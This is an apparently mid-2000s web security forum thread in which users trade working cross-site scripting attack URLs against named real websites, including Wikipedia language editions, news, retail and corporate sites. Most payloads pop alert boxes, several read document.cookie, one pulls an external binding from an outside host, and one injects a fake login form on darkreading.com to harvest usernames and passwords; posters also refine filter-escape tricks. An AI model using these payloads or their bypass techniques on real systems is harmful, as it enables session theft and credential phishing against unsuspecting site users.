maluc Wrote:
-------------------------------------------------------
> haxxed without even trying.. >.>
> http://www.hackersafe.com/error/msg.jsp?msg=Haxxor
> ed
>
> -maluc

lmfao

- so who here wants to create a new company with me called "HackerProof".



Business Model
Basically what we will do is offer an gif for commerical websites @ $5000 a year ($7500 for an animated version). For that you get to go into our "hacker proof" directory listing of "safe" sites.

How it works
> Our highly accurate smart deduction engine scans your website in real time... in fact in 6 out of 10 tests we can actually deduce whether you are using asp, php, aspx, jsp or even cfm.

> The HackerProof vulnerability knowledge module is a self aware emotional system with over 70 million unique vulnerabilities contained within its reasoning logic function. In fact it is so smart that it creates over 7000 new vunerabilities every single day.

> The HackerProof non-intrusive website audits will not effect your webserver or its performance at all. In fact our audits are so non intrusive that a log file examination wouldn't even find any trace of us.


So who is with me? i would suggest you get in before we release the IPO!

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Haha that's great!

Sla.ckers.org partners with http://www.bk.com/history.aspx?PageTitle=With%20a%20side%20of%20Sla.ckers.org%22);alert('xss');test=(%22

Broken filter that you can escape the escapes...

http://www.clickapps.com/search_results.htm?searchterm=\\\'\%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Ca=\%22&PHPSESSID=c5304cc93b166333aa6890e45d304117%3Cxss='

XSS @ "Freundeskreis Halbe" a German Right - Wing Connection and with that i mean they're fuckin nazis shame on my country, i did the xss without proxy so its ur turn now ..

http://www.fkhalbe.net/gbuch/guestbook_changeentry.php?entry=%22%3Ch2%3Eomgwtfxss%3C/h2%3E

Quote

i did the xss without proxy so its ur turn now ..

done.

http://db.ard.de/abc/CG.suchausgabe?p_buchstabe='%22%3C/title%3E%3Cscript%3Ealert(123)%3C/script%3E

http://www.turkishdailynews.com.tr/article.php?enewsid=58929%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

http://www.ufc.com/index.cfm?fa=search.results&ss=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

First post on this board.

http://fr.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://nl.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://ru.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go

Expect this to be fixed shortly.

– mesca
« Reality is merely an illusion, albeit a very persistent one. » – Albert Einstein

Nice post, mesca! I'm a little surprised no one else found it first.

- RSnake
Gotta love it. http://ha.ckers.org

ya, it is.. i never bothered to check the other languages of wiki sites.. although i'm sure i checked the en.wiki one a while back

good job

-maluc

some fresh ones for the relaunch of my homepage:

http://www.wintotal.de/User/LogInOut.php?URL='%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://leaguez.yusho.de/?module=news'%22%3Cscript%3Ealert(123)%3C/script%3E
http://www.MAN.de/index.php?id=520&tx_ttnews[tt_news]=1585&tx_ttnews[backPid]=262'%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://www.genomics.sinica.edu.tw/index.php?t=13'%22%3E%3Cscript%3Ealert(123)%3C/script%3E&article_id=44
http://instantcontent.freenet.de/content.php?templ=1&Cat_id=9&design_id=4&FarbeTitel=FFFFFF&HFarbeTitel=3366FF&FarbeHeadlines=000099&HFarbeHeadlines=CCCCFF%3Ci%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/i%3E%3Cbr%3E&FarbeRahmen=3366FF&Anzahl=5
http://www.counter-strike.de/content/cs16/spraylogos/index.php?seite=2'%22%3Cscript%3Ealert(123)%3C/script%3E
http://www.cs-expert.de/cse_user_profil.php?m_id=1%22%3Cscript%3Ealert(123)%3C/script%3E
http://www.planet.com.tw/product/product_dm.php?product_id=267&menu_id=15'%22%3E%3Cscript%3Ealert(123)%3C/script%3E

alf,

> http://www.MAN.de [broken link]

Funny, I was auditing a Typo3 website last month for a big company and found a lot of issues around this tt_news module.

Hint: there is also some problems with Typo3 core and some other modules. I signed a non-disclosure agreement so I can't tell you what they are. At least, you know there are more issues on Typo3! Have fun :)

– mesca
« Reality is merely an illusion, albeit a very persistent one. » – Albert Einstein

There's not many of these, this one requires forging the referer hence using flash and it being IE only: http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.hackr.org/yourinfo.php&referer=<script>alert(1337)</script>
Same site, more normal XSS: http://www.hackr.org/users.php?user=blasterX13%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 11/12/2006 05:31PM by WhiteAcid.

rsnake Wrote:
-------------------------------------------------------
> Did you know that XSS is in the dictionary?
> http://dictionary.reference.com/browse/';alert('XS
> S%20n.%20to%20haX0r')//

http://dictionary.reference.com/search?q=%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss');xx:expression(alert('IE%20SUX..%20get%20firefox!'))%22%20%20xss=%22

You can even inject stuff into the meta-tags! (I will also post this in the redirects thread):

http://dictionary.reference.com/browse/0;url=http://google.com%22%20http-equiv=%22refresh%22%20xss=%22

Hi, this is my first post

[[url=http://www.apress.com/ecommerce/cart.html/'%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C]apress[/url]]

mesca Wrote:
-------------------------------------------------------
> alf,
>
> > http://www.MAN.de
>
> Funny, I was auditing a Typo3 website last month
> for a big company and found a lot of issues around
> this tt_news module.
>
> Hint: there is also some problems with Typo3 core
> and some other modules. I signed a non-disclosure
> agreement so I can't tell you what they are. At
> least, you know there are more issues on Typo3!
> Have fun :)

ah yes, i've found some in the past ( one @ gulli.com ;) ) and yeh that would be great but thats not my main aim. I just want to gather as much "sounding" names of german companies etc. in my xss list, (tv companies, car manufacturers, shop systems and stuff like that) then tell them they should fix this ^.^

welcome to the boards xknown ^^

-maluc

Thanks maluc :)

More on apress
[[url=http://www.apress.com/book/search.html/'%22%3Cscript%3Ealert('XSS')%3C/script%3E%3C]apress search[/url]]
[[url=http://www.apress.com/newsletter/subscribe.html/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E]apress newsletter[/url]]

Hi, I'm new here and this is my first post - hopefully I'm doing this right and these aren't dupes.

[www.cbsnews.com]
[www.search.com]
[search.oprah.com]
[search.businessweek.com]
[www.findarticles.com]
[newstrove.com]
[www.coldwellbanker.com]
[yellowpages.superpages.com]
[castle.pricewatch.com]

Welcome to the site guys.

-id

http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.hackr.org/yourinfo.php&sp=sp&db=bugtraq&search=%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22DIGI7AL64%22%29%3E << Not a redirect (WhiteAcid you have a vun... \0/ for me)

http://msgs.securepoint.com/cgi/AT-sp-search?sp=sp&db=bugtraq&search=%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E

both only firefox though i assume with a little bit of work you could get ie to fire a vun or 2.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

heh, giving whiteacid extra work to do :T

and they'll both work in IE if you only use onload=alert rather than onload!@#$%^=alert

http://msgs.securepoint.com/cgi/AT-sp-search?sp=sp&db=bugtraq&search=%22%3E%3CBODY+onload%3Dalert%28%22XSS%22%29%3E%3Cx

for whiteacid you also have to escape the object tag with </object>

http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.hackr.org/yourinfo.php&sp=sp&db=bugtraq&search=%22%3E%3C/object%3E%3CBODY+onload%3Dalert%28%22DIGI7AL64%22%29%3E%3Cx

-maluc



Edited 1 time(s). Last edit at 11/14/2006 12:02AM by maluc.

http://hp.infonow.net/bin/findNow?CLIENT_ID=HP_LOC_CAN_SRV&PAGE=SearchFinal.html&PROD_DESC_NUM=6&HIDDEN_TIER_2_TEXT=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Thanks for those guys. Well done. I've done echo htmlentities($vars, ENT_QUOTES); now instead of just echo $vars;.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

[www.careerbuilder.com]
[patft.uspto.gov]
[www.medicinenet.com]
[focus-webapps.ti.com]
[www.riaaradar.com]
[www5.jcpenney.com]
[www.sears.com]
[search.money.cnn.com]
[hd.net]
[search.sportsillustrated.cnn.com]

A double whammy for Darkreading...

URL redirection and XSS (this example inserts a new login form and hides the others)

http://www.darkreading.com/login.asp?start=yes&nexturl=http%3A%2F%2Fwww%2Esla.ckers.org%2Ecom&webinar_id=&errStr=%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cform%20action=%22login_action.asp%22%20method=%22POST%22%3E%3Cinput%20type=%22hidden%22%3E%3Ctable%20cellpadding=%228%22%3E%3Ctr%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cb%3EUsername%3C/b%3E%3C/font%3E%3C/td%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cinput%20type=%22text%22%20name=%22usr_username%22%20size=%2220%22%20value=%22%22%3E%3C/font%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cb%3EPassword%3C/b%3E%3C/font%3E%3C/td%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cinput%20type=%22password%22%20name=%22usr_password%22%20size=%2220%22%20value=%22%22%3E%3C/font%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cb%3E%3C/b%3E%3C/font%3E%3C/td%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cinput%20type=%22submit%22%20name=%22action%22%20value=%22Login%22%3E%3C/font%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C!--

[www.pcmall.com]
[www.blockbuster.com]
[movies.aol.com]
[www.anywho.com]
[query.nytimes.com]

They "fixed" the Wikipedia XSS, and the developers even complain about poorly designed js scripts: http://bugzilla.wikipedia.org/show_bug.cgi?id=7888

But wait, did I say they repaired their code?

Reloaded:
http://fr.wikipedia.org/wiki/Special:Search?search=%22%3C%3E%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://nl.wikipedia.org/wiki/Special:Search?search=%22%3C%3E%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://ru.wikipedia.org/wiki/Special:Search?search=%22%3C%3E%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go

– mesca
« Reality is merely an illusion, albeit a very persistent one. » – Albert Einstein